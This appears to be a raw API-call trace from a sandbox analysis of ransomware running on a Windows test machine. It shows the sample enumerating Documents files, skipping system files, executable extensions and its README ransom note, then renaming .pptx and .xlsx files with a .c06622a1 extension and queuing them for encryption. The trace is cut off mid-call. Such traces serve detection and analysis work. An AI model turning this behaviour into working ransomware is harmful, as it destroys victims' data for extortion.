[0149.754] RtlComputeCrc32 (PartialCrc=0xe806, Buffer=0x5480094, Length=0x80) returned 0xd8ec3d9a [0149.754] RtlComputeCrc32 (PartialCrc=0x3d9a, Buffer=0x5480094, Length=0x80) returned 0x9604c92b [0149.754] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5480020) returned 1 [0149.754] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.755] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.755] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x432926e0, ftCreationTime.dwHighDateTime=0x1d56186, ftLastAccessTime.dwLowDateTime=0x5d64d0c0, ftLastAccessTime.dwHighDateTime=0x1d5a99f, ftLastWriteTime.dwLowDateTime=0x5d64d0c0, ftLastWriteTime.dwHighDateTime=0x1d5a99f, nFileSizeHigh=0x0, nFileSizeLow=0x21d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="sH18QgfdAy-EUtCu.pptx", cAlternateFileName="SH18QG~1.PPT")) returned 1 [0149.755] _wcsicmp (_Str1="sH18QgfdAy-EUtCu.pptx", _Str2="README.c06622a1.TXT") returned 1 [0149.755] wcsstr (_Str="sH18QgfdAy-EUtCu.pptx", _SubStr="README") returned 0x0 [0149.755] _wcsicmp (_Str1="autorun.inf", _Str2="sH18QgfdAy-EUtCu.pptx") returned -18 [0149.755] wcslen (_String="autorun.inf") returned 0xb [0149.755] _wcsicmp (_Str1="boot.ini", _Str2="sH18QgfdAy-EUtCu.pptx") returned -17 [0149.755] wcslen (_String="boot.ini") returned 0x8 [0149.755] _wcsicmp (_Str1="bootfont.bin", _Str2="sH18QgfdAy-EUtCu.pptx") returned -17 [0149.755] wcslen (_String="bootfont.bin") returned 0xc [0149.755] _wcsicmp (_Str1="bootsect.bak", _Str2="sH18QgfdAy-EUtCu.pptx") returned -17 [0149.755] wcslen (_String="bootsect.bak") returned 0xc [0149.755] _wcsicmp (_Str1="desktop.ini", _Str2="sH18QgfdAy-EUtCu.pptx") returned -15 [0149.755] wcslen (_String="desktop.ini") returned 0xb [0149.755] _wcsicmp (_Str1="iconcache.db", _Str2="sH18QgfdAy-EUtCu.pptx") returned -10 [0149.755] wcslen (_String="iconcache.db") returned 0xc [0149.755] _wcsicmp (_Str1="ntldr", _Str2="sH18QgfdAy-EUtCu.pptx") returned -5 [0149.755] wcslen (_String="ntldr") returned 0x5 [0149.755] _wcsicmp (_Str1="ntuser.dat", _Str2="sH18QgfdAy-EUtCu.pptx") returned -5 [0149.755] wcslen (_String="ntuser.dat") returned 0xa [0149.755] _wcsicmp (_Str1="ntuser.dat.log", _Str2="sH18QgfdAy-EUtCu.pptx") returned -5 [0149.755] wcslen (_String="ntuser.dat.log") returned 0xe [0149.755] _wcsicmp (_Str1="ntuser.ini", _Str2="sH18QgfdAy-EUtCu.pptx") returned -5 [0149.755] wcslen (_String="ntuser.ini") returned 0xa [0149.756] _wcsicmp (_Str1="thumbs.db", _Str2="sH18QgfdAy-EUtCu.pptx") returned 1 [0149.756] wcslen (_String="thumbs.db") returned 0x9 [0149.756] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0149.756] wcslen (_String="386") returned 0x3 [0149.756] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0149.756] wcslen (_String="adv") returned 0x3 [0149.756] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0149.756] wcslen (_String="ani") returned 0x3 [0149.756] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0149.756] wcslen (_String="bat") returned 0x3 [0149.756] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0149.756] wcslen (_String="bin") returned 0x3 [0149.756] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0149.756] wcslen (_String="cab") returned 0x3 [0149.756] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0149.756] wcslen (_String="cmd") returned 0x3 [0149.756] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0149.756] wcslen (_String="com") returned 0x3 [0149.756] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0149.756] wcslen (_String="cpl") returned 0x3 [0149.756] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0149.756] wcslen (_String="cur") returned 0x3 [0149.756] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0149.756] wcslen (_String="deskthemepack") returned 0xd [0149.757] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0149.757] wcslen (_String="diagcab") returned 0x7 [0149.757] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0149.757] wcslen (_String="diagcfg") returned 0x7 [0149.757] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0149.757] wcslen (_String="diagpkg") returned 0x7 [0149.757] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0149.757] wcslen (_String="dll") returned 0x3 [0149.757] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0149.757] wcslen (_String="drv") returned 0x3 [0149.757] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0149.757] wcslen (_String="exe") returned 0x3 [0149.757] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0149.757] wcslen (_String="hlp") returned 0x3 [0149.757] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0149.757] wcslen (_String="icl") returned 0x3 [0149.757] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0149.757] wcslen (_String="icns") returned 0x4 [0149.757] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0149.757] wcslen (_String="ico") returned 0x3 [0149.757] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0149.757] wcslen (_String="ics") returned 0x3 [0149.757] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0149.757] wcslen (_String="idx") returned 0x3 [0149.757] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0149.757] wcslen (_String="ldf") returned 0x3 [0149.758] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0149.758] wcslen (_String="lnk") returned 0x3 [0149.758] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0149.758] wcslen (_String="mod") returned 0x3 [0149.758] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0149.758] wcslen (_String="mpa") returned 0x3 [0149.758] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0149.758] wcslen (_String="msc") returned 0x3 [0149.758] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0149.758] wcslen (_String="msp") returned 0x3 [0149.758] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0149.758] wcslen (_String="msstyles") returned 0x8 [0149.758] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0149.758] wcslen (_String="msu") returned 0x3 [0149.758] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0149.758] wcslen (_String="nls") returned 0x3 [0149.758] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0149.758] wcslen (_String="nomedia") returned 0x7 [0149.758] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0149.758] wcslen (_String="ocx") returned 0x3 [0149.758] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0149.758] wcslen (_String="prf") returned 0x3 [0149.758] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0149.758] wcslen (_String="ps1") returned 0x3 [0149.758] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0149.758] wcslen (_String="rom") returned 0x3 [0149.759] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0149.759] wcslen (_String="rtp") returned 0x3 [0149.759] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0149.759] wcslen (_String="scr") returned 0x3 [0149.759] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0149.759] wcslen (_String="shs") returned 0x3 [0149.759] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0149.759] wcslen (_String="spl") returned 0x3 [0149.759] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0149.759] wcslen (_String="sys") returned 0x3 [0149.759] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0149.759] wcslen (_String="theme") returned 0x5 [0149.759] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0149.759] wcslen (_String="themepack") returned 0x9 [0149.759] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0149.759] wcslen (_String="wpx") returned 0x3 [0149.759] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0149.759] wcslen (_String="lock") returned 0x4 [0149.759] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0149.759] wcslen (_String="key") returned 0x3 [0149.759] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0149.759] wcslen (_String="hta") returned 0x3 [0149.759] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0149.759] wcslen (_String="msi") returned 0x3 [0149.759] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0149.759] wcslen (_String="pdb") returned 0x3 [0149.760] _wcsicmp (_Str1="sql", _Str2="pptx") returned 3 [0149.760] wcslen (_String="sql") returned 0x3 [0149.760] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0149.760] wcslen (_String="sqlite") returned 0x6 [0149.760] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0149.760] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.760] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0149.760] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0149.760] wcscpy (in: _Dest=0x44d00d0, _Source="sH18QgfdAy-EUtCu.pptx" | out: _Dest="sH18QgfdAy-EUtCu.pptx") returned="sH18QgfdAy-EUtCu.pptx" [0149.760] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sH18QgfdAy-EUtCu.pptx", dwFileAttributes=0x80) returned 1 [0149.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sH18QgfdAy-EUtCu.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sh18qgfday-eutcu.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0149.760] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.761] ReadFile (in: hFile=0x610, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0149.761] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x3eefbe7c [0149.761] RtlComputeCrc32 (PartialCrc=0xbe7c, Buffer=0x3feb74, Length=0x80) returned 0xe06a5002 [0149.761] RtlComputeCrc32 (PartialCrc=0x5002, Buffer=0x3feb74, Length=0x80) returned 0x3a0860d2 [0149.761] RtlComputeCrc32 (PartialCrc=0x60d2, Buffer=0x3feb74, Length=0x80) returned 0xef69823c [0149.761] RtlComputeCrc32 (PartialCrc=0x823c, Buffer=0x3feb74, Length=0x80) returned 0x2efb26a9 [0149.761] CloseHandle (hObject=0x610) returned 1 [0149.762] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.762] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sH18QgfdAy-EUtCu.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sH18QgfdAy-EUtCu.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sH18QgfdAy-EUtCu.pptx" [0149.762] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sH18QgfdAy-EUtCu.pptx") returned 0x41 [0149.762] wcscpy (in: _Dest=0x44e0102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.762] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sH18QgfdAy-EUtCu.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sh18qgfday-eutcu.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sH18QgfdAy-EUtCu.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sh18qgfday-eutcu.pptx.c06622a1"), dwFlags=0x8) returned 1 [0149.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sH18QgfdAy-EUtCu.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sh18qgfday-eutcu.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x610 [0149.764] CreateIoCompletionPort (FileHandle=0x610, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.764] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x5510020 [0149.771] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1e9c1904 [0149.771] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5226a204 [0149.771] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5a209859 [0149.771] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3ba50 [0149.771] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x323ba392 [0149.771] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4eb32f1c [0149.772] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x9c5345f [0149.772] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x39d58471 [0149.775] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x5510094, Length=0x80) returned 0xa1153470 [0149.775] RtlComputeCrc32 (PartialCrc=0x3470, Buffer=0x5510094, Length=0x80) returned 0x4f105f1d [0149.775] RtlComputeCrc32 (PartialCrc=0x5f1d, Buffer=0x5510094, Length=0x80) returned 0x2d1c56a3 [0149.775] RtlComputeCrc32 (PartialCrc=0x56a3, Buffer=0x5510094, Length=0x80) returned 0x75d031ca [0149.775] RtlComputeCrc32 (PartialCrc=0x31ca, Buffer=0x5510094, Length=0x80) returned 0x8ff65e6f [0149.775] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5510020) returned 1 [0149.775] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.775] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.775] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5fcdb90, ftCreationTime.dwHighDateTime=0x1d5c696, ftLastAccessTime.dwLowDateTime=0x5e25e110, ftLastAccessTime.dwHighDateTime=0x1d56436, ftLastWriteTime.dwLowDateTime=0x5e25e110, ftLastWriteTime.dwHighDateTime=0x1d56436, nFileSizeHigh=0x0, nFileSizeLow=0x25e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="t12Tfg.xlsx", cAlternateFileName="T12TFG~1.XLS")) returned 1 [0149.776] _wcsicmp (_Str1="t12Tfg.xlsx", _Str2="README.c06622a1.TXT") returned 2 [0149.776] wcsstr (_Str="t12Tfg.xlsx", _SubStr="README") returned 0x0 [0149.776] _wcsicmp (_Str1="autorun.inf", _Str2="t12Tfg.xlsx") returned -19 [0149.776] wcslen (_String="autorun.inf") returned 0xb [0149.776] _wcsicmp (_Str1="boot.ini", _Str2="t12Tfg.xlsx") returned -18 [0149.776] wcslen (_String="boot.ini") returned 0x8 [0149.776] _wcsicmp (_Str1="bootfont.bin", _Str2="t12Tfg.xlsx") returned -18 [0149.776] wcslen (_String="bootfont.bin") returned 0xc [0149.776] _wcsicmp (_Str1="bootsect.bak", _Str2="t12Tfg.xlsx") returned -18 [0149.776] wcslen (_String="bootsect.bak") returned 0xc [0149.776] _wcsicmp (_Str1="desktop.ini", _Str2="t12Tfg.xlsx") returned -16 [0149.776] wcslen (_String="desktop.ini") returned 0xb [0149.776] _wcsicmp (_Str1="iconcache.db", _Str2="t12Tfg.xlsx") returned -11 [0149.776] wcslen (_String="iconcache.db") returned 0xc [0149.776] _wcsicmp (_Str1="ntldr", _Str2="t12Tfg.xlsx") returned -6 [0149.776] wcslen (_String="ntldr") returned 0x5 [0149.776] _wcsicmp (_Str1="ntuser.dat", _Str2="t12Tfg.xlsx") returned -6 [0149.776] wcslen (_String="ntuser.dat") returned 0xa [0149.776] _wcsicmp (_Str1="ntuser.dat.log", _Str2="t12Tfg.xlsx") returned -6 [0149.776] wcslen (_String="ntuser.dat.log") returned 0xe [0149.776] _wcsicmp (_Str1="ntuser.ini", _Str2="t12Tfg.xlsx") returned -6 [0149.776] wcslen (_String="ntuser.ini") returned 0xa [0149.776] _wcsicmp (_Str1="thumbs.db", _Str2="t12Tfg.xlsx") returned 55 [0149.776] wcslen (_String="thumbs.db") returned 0x9 [0149.777] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0149.777] wcslen (_String="386") returned 0x3 [0149.777] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0149.777] wcslen (_String="adv") returned 0x3 [0149.777] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0149.777] wcslen (_String="ani") returned 0x3 [0149.777] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0149.777] wcslen (_String="bat") returned 0x3 [0149.777] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0149.777] wcslen (_String="bin") returned 0x3 [0149.777] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0149.777] wcslen (_String="cab") returned 0x3 [0149.777] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0149.777] wcslen (_String="cmd") returned 0x3 [0149.777] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0149.777] wcslen (_String="com") returned 0x3 [0149.777] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0149.777] wcslen (_String="cpl") returned 0x3 [0149.777] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0149.777] wcslen (_String="cur") returned 0x3 [0149.777] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0149.777] wcslen (_String="deskthemepack") returned 0xd [0149.777] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0149.777] wcslen (_String="diagcab") returned 0x7 [0149.777] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0149.778] wcslen (_String="diagcfg") returned 0x7 [0149.778] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0149.778] wcslen (_String="diagpkg") returned 0x7 [0149.778] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0149.778] wcslen (_String="dll") returned 0x3 [0149.778] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0149.778] wcslen (_String="drv") returned 0x3 [0149.778] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0149.778] wcslen (_String="exe") returned 0x3 [0149.778] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0149.778] wcslen (_String="hlp") returned 0x3 [0149.778] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0149.778] wcslen (_String="icl") returned 0x3 [0149.778] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0149.778] wcslen (_String="icns") returned 0x4 [0149.778] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0149.778] wcslen (_String="ico") returned 0x3 [0149.778] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0149.778] wcslen (_String="ics") returned 0x3 [0149.778] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0149.778] wcslen (_String="idx") returned 0x3 [0149.778] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0149.778] wcslen (_String="ldf") returned 0x3 [0149.778] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0149.778] wcslen (_String="lnk") returned 0x3 [0149.779] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0149.779] wcslen (_String="mod") returned 0x3 [0149.779] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0149.779] wcslen (_String="mpa") returned 0x3 [0149.779] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0149.779] wcslen (_String="msc") returned 0x3 [0149.779] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0149.779] wcslen (_String="msp") returned 0x3 [0149.779] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0149.779] wcslen (_String="msstyles") returned 0x8 [0149.779] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0149.779] wcslen (_String="msu") returned 0x3 [0149.779] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0149.779] wcslen (_String="nls") returned 0x3 [0149.779] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0149.779] wcslen (_String="nomedia") returned 0x7 [0149.779] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0149.779] wcslen (_String="ocx") returned 0x3 [0149.779] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0149.779] wcslen (_String="prf") returned 0x3 [0149.779] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0149.779] wcslen (_String="ps1") returned 0x3 [0149.779] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0149.779] wcslen (_String="rom") returned 0x3 [0149.779] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0149.779] wcslen (_String="rtp") returned 0x3 [0149.780] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0149.780] wcslen (_String="scr") returned 0x3 [0149.780] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0149.780] wcslen (_String="shs") returned 0x3 [0149.780] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0149.780] wcslen (_String="spl") returned 0x3 [0149.780] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0149.780] wcslen (_String="sys") returned 0x3 [0149.780] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0149.780] wcslen (_String="theme") returned 0x5 [0149.780] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0149.780] wcslen (_String="themepack") returned 0x9 [0149.780] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0149.780] wcslen (_String="wpx") returned 0x3 [0149.780] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0149.780] wcslen (_String="lock") returned 0x4 [0149.780] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0149.780] wcslen (_String="key") returned 0x3 [0149.780] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0149.780] wcslen (_String="hta") returned 0x3 [0149.780] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0149.780] wcslen (_String="msi") returned 0x3 [0149.780] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0149.780] wcslen (_String="pdb") returned 0x3 [0149.781] _wcsicmp (_Str1="sql", _Str2="xlsx") returned -5 [0149.781] wcslen (_String="sql") returned 0x3 [0149.781] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0149.781] wcslen (_String="sqlite") returned 0x6 [0149.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0149.781] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0149.781] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0149.781] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0149.781] wcscpy (in: _Dest=0x44d00d0, _Source="t12Tfg.xlsx" | out: _Dest="t12Tfg.xlsx") returned="t12Tfg.xlsx" [0149.781] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t12Tfg.xlsx", dwFileAttributes=0x80) returned 1 [0149.781] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t12Tfg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\t12tfg.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0149.781] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.781] ReadFile (in: hFile=0x664, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0149.782] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x32ff33f1 [0149.782] RtlComputeCrc32 (PartialCrc=0x33f1, Buffer=0x3feb74, Length=0x80) returned 0x92c98d7b [0149.782] RtlComputeCrc32 (PartialCrc=0x8d7b, Buffer=0x3feb74, Length=0x80) returned 0x8e6fe6a6 [0149.782] RtlComputeCrc32 (PartialCrc=0xe6a6, Buffer=0x3feb74, Length=0x80) returned 0x998f6ab9 [0149.782] RtlComputeCrc32 (PartialCrc=0x6ab9, Buffer=0x3feb74, Length=0x80) returned 0x4f8c165e [0149.782] CloseHandle (hObject=0x664) returned 1 [0149.782] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0149.782] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t12Tfg.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t12Tfg.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t12Tfg.xlsx" [0149.783] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t12Tfg.xlsx") returned 0x37 [0149.783] wcscpy (in: _Dest=0x44e00ee, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.783] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t12Tfg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\t12tfg.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t12Tfg.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\t12tfg.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0149.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t12Tfg.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\t12tfg.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x664 [0149.785] CreateIoCompletionPort (FileHandle=0x664, ExistingCompletionPort=0x5dc, CompletionKey=0x0, 